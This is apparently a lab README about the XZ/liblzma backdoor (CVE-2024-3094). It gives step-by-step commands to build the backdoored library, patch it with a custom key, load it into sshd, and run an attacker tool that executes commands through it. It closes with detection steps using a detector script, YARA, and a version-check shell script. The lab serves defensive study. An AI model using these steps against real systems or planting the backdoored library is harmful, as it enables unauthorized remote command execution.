## https://sploitus.com/exploit?id=B25FC383-2015-523B-A1F7-8F5D7DC56D44
# 🛡️ Cybersecurity Project: Analyzing the XZ Backdoor in liblzma
## Overview
This project analyzes the high-profile backdoor discovered in **xz-utils (liblzma)**, affecting versions **5.6.0** and **5.6.1**. The malicious code introduced into the upstream build system targeted SSH authentication by modifying how `sshd` interacts with the LZMA compression library at runtime.
> ⚠️ This project is for **educational and defensive research** purposes only.
# Vulnerable machine
Clone this repository:
```bash
git clone https://github.com/valeriot30/cve-2024-3094
```
Navigate to the directory:
```bash
cd cve-2024-3094
```
Build and spawn the Docker container (it publishes the container's SSH port on host port 2222):
```bash
docker build -t fedora-dev .
docker run --privileged -it --rm -p 2222:22 fedora-dev
```
Inside the container, fetch the backdoored release of the library:
```bash
cd ~
git clone https://github.com/thesamesam/xz-archive.git
cd xz-archive/5.6/   # the backdoored release (5.6.1 works as well)
tar xzf xz-5.6.0.tar.gz
mv xz-5.6.0 ~
```
Export the build target:
```bash
export RPM_ARCH=$(uname -m)
```
Compile the backdoored library:
```bash
cd ~
cd ./xz-5.6.0/
./configure
make -j 8
```
Copy the built shared object out of the source tree:
```bash
cp ./src/liblzma/.libs/liblzma.so.5.6.0 ~
```
Clone the repository again, this time inside the container:
```bash
git clone https://github.com/valeriot30/cve-2024-3094
```
Patch the liblzma library with a custom key:
```bash
python3 cve-2024-3094/patch.py liblzma.so.5.6.0
```
Link the patched library into the system:
```bash
sh cve-2024-3094/inject.sh
```
Run `sshd` so that it loads the patched library:
```bash
env -i LANG=C /usr/sbin/sshd -D &
```
# Attacker machine
Clone this repository:
```bash
git clone https://github.com/valeriot30/cve-2024-3094
```
Navigate to the directory:
```bash
cd cve-2024-3094
```
Compile the Go tool:
```bash
go build
```
Run the tool, passing the vulnerable machine's address and the command to execute:
```bash
./bot -addr 127.0.0.2:2222 -cmd 'sleep 60'
```
# Counter-Measures
## Using the detector
Run the detector:
```bash
sh detector.sh
```
## Using Yara
Run the YARA rules against the library (`-s` prints the matching strings):
```bash
yara rule.yar ../liblzma.so.5.6.0 -s
```
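The repository's `detector.sh` is the script the project ships; the following is an added triage check, not part of this project, that a defender can run on any host to answer the first question the detector addresses: does the running `sshd` link a liblzma from one of the two affected releases? It assumes the conventional paths `/usr/sbin/sshd` and a versioned library file name such as `liblzma.so.5.6.0` (which is exactly what `inject.sh` places in this lab); a distribution build may carry a different version suffix, so a "not affected" verdict from the name alone is a starting point, not proof.

```bash
#!/bin/sh
# Added defensive check (not the repository's own detector.sh): reports whether
# the sshd on this host links a liblzma from the two backdoored upstream
# releases, 5.6.0 and 5.6.1. Paths are conventional defaults assumed here.

# Return 0 when $1 is one of the two affected upstream versions.
is_affected_version() {
    case "$1" in
        5.6.0|5.6.1) return 0 ;;
        *) return 1 ;;
    esac
}

# Print the version suffix of a resolved library path such as
# /usr/lib64/liblzma.so.5.6.0; return 1 when the name carries no version.
liblzma_version_from_path() {
    v=${1##*liblzma.so.}
    [ "$v" != "$1" ] && [ -n "$v" ] || return 1
    printf '%s\n' "$v"
}

# Read ldd output on stdin and print the path ldd resolved liblzma to
# (prints nothing when the binary does not link liblzma at all).
liblzma_path_from_ldd() {
    awk '/liblzma\.so/ { for (i = 1; i <= NF; i++) if ($i ~ /^\//) { print $i; exit } }'
}

# Inspect one sshd binary (default /usr/sbin/sshd). Prints a verdict and
# returns 0 for "affected", 1 for "not affected", 2 when nothing could be checked.
check_sshd() {
    sshd=${1:-/usr/sbin/sshd}
    [ -x "$sshd" ] || { echo "no sshd at $sshd"; return 2; }
    lib=$(ldd "$sshd" 2>/dev/null | liblzma_path_from_ldd)
    if [ -z "$lib" ]; then
        echo "$sshd does not link liblzma: not exposed to this backdoor"
        return 1
    fi
    # ldd normally prints the soname symlink (liblzma.so.5); resolve it to the
    # real file so the version suffix becomes visible.
    real=$(readlink -f "$lib" 2>/dev/null || printf '%s' "$lib")
    ver=$(liblzma_version_from_path "$real") || { echo "cannot read a version from $real"; return 2; }
    if is_affected_version "$ver"; then
        echo "AFFECTED: $sshd loads $real (liblzma $ver)"
        return 0
    fi
    echo "not affected by name: $sshd loads $real (liblzma $ver)"
    return 1
}

# Usage: sh check_sshd_lzma.sh --check [/path/to/sshd]
# The functions above can also be sourced into another script.
if [ "${1:-}" = "--check" ]; then
    check_sshd "${2:-/usr/sbin/sshd}"
fi
```

Run it with `--check` on the vulnerable container after `inject.sh` and it reports the patched `liblzma.so.5.6.0`; run it on a clean host and it reports the distribution's version. Pair it with `xz --version` and the YARA rule from the next section, since a name check alone cannot see a relinked or renamed library.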